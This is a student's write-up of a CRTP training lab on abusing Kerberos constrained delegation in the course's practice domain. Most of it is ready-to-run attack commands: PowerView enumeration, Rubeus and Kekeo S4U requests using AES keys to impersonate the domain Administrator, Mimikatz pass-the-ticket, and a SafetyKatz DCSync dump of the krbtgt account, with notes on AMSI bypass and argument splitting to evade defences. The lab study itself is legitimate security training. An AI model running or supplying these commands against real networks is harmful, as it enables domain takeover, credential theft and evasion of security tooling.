CRTP Lab 16

Task 1

Enumerate users in the domain for whom Constrained Delegation is enabled.

  • For such a user, request a TGT from the DC and obtain a TGS for the service to which delegation is configured.

  • Pass the ticket and access the service

Use Invishell to and use PowerView to enumerate users with constrained delegation enabled.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

PS C:\Users\student372> . C:\AD\Tools\PowerView.ps1


PS C:\Users\student372> Get-DomainUser -TrustedToAuth

WebSVC has constrained delegation enabled. Since we already have websvc creds, we can use them to access the CIFS/dcorp-mssql as a domain admin.

As domain admin, we request TGS for websvc (first hop). This TGS is used to access the CIFS service.

Abuse with Rubeus

We use the websvc hash to request TGS as Domain Administrator from KDC and import it.

# ArgSplit for "s4u"

C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /user:websvc /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7 /impersonateuser:Administrator /msdsspn:"CIFS/dcorp-mssql.dollarcorp.moneycorp.LOCAL" /ptt

klist

Now we can access the CIFS service

C:\Windows\system32>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Abuse with Kekeo

Request a TGT from websvc.

C:\Windows\system32>cd C:\AD\Tools\kekeo\x64

C:\AD\Tools\kekeo\x64>.\kekeo.exe

kekeo # tgt::ask /user:websvc /domain:dollarcorp.moneycorp.local /aes256:2d84a12f614ccbf3d716b8339cbbe1a650e5fb352edc8e879470ade07e5412d7

We can use this TGT to request a TGS. We are requesting TGS to access CIFS/dcorp-mssql as DA.

kekeo # tgs::s4u /tgt:TGT_websvc@DOLLARCORP.MONEYCORP.LOCAL_krbtgt~dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL.kirbi /user:Administrator@dollarcorp.moneycorp.local /service:cifs/dcorp-mssql.dollarcorp.moneycorp.LOCAL

Since the ticket is stored in a file, we can inject it in current session to use it. Open InviShell, Import Mimi, pass the ticket.

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Invoke-Mimi.ps1

Invoke-Mimi -Command '"kerberos::ptt TGS_Administrator@dollarcorp.moneycorp.local@DOLLARCORP.MONEYCORP.LOCAL_cifs~dcorp-mssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'

We can now access the CIFS service.

C:\AD\Tools\kekeo\x64>dir \\dcorp-mssql.dollarcorp.moneycorp.local\c$

Task 2

Enumerate computer accounts in the domain for which Constrained Delegation is enabled.

  • For such a user, request a TGT from the DC.

  • Obtain an alternate TGS for LDAP service on the target machine.

  • Use the TGS for executing DCSync attack.

We use Invishell and import PowerView to find users with constrained delegation.

# InviShell and AMSI bypass, then PowerView:
PS C:\AD\Tools\kekeo\x64> . C:\AD\Tools\PowerView.ps1

# Enumerate Computers with Constrained Delegation enabled
PS C:\AD\Tools\kekeo\x64> Get-DomainComputer -TrustedToAuth

dcorp-adminsrv has constrained delegation. Since we have AES keys of adminsrv, we use Rubeus to impersonate as Domain Admin.

# ArgSplit for s4u
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args s4u /user:dcorp-adminsrv$ /aes256:e9513a0ac270264bb12fb3b3ff37d7244877d269a97c7b3ebc3f6f78c382eb51 /impersonateuser:Administrator /msdsspn:time/dcorp-dc.dollarcorp.moneycorp.LOCAL /altservice:ldap /ptt

To abuse LDAP ticket we just imported, we use DCSync to dump the secrets.

# Notice that we can replace the service since it is not encrypted. So instead of TIME, we replaced it with LDAP. Can do HTTP as well.
# ArgSplit lsadump::dcsync

C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:dcorp\krbtgt" "exit"

PreviousConstrained DelegationNextResource Based Constrained Delegation (RBCD)

Last updated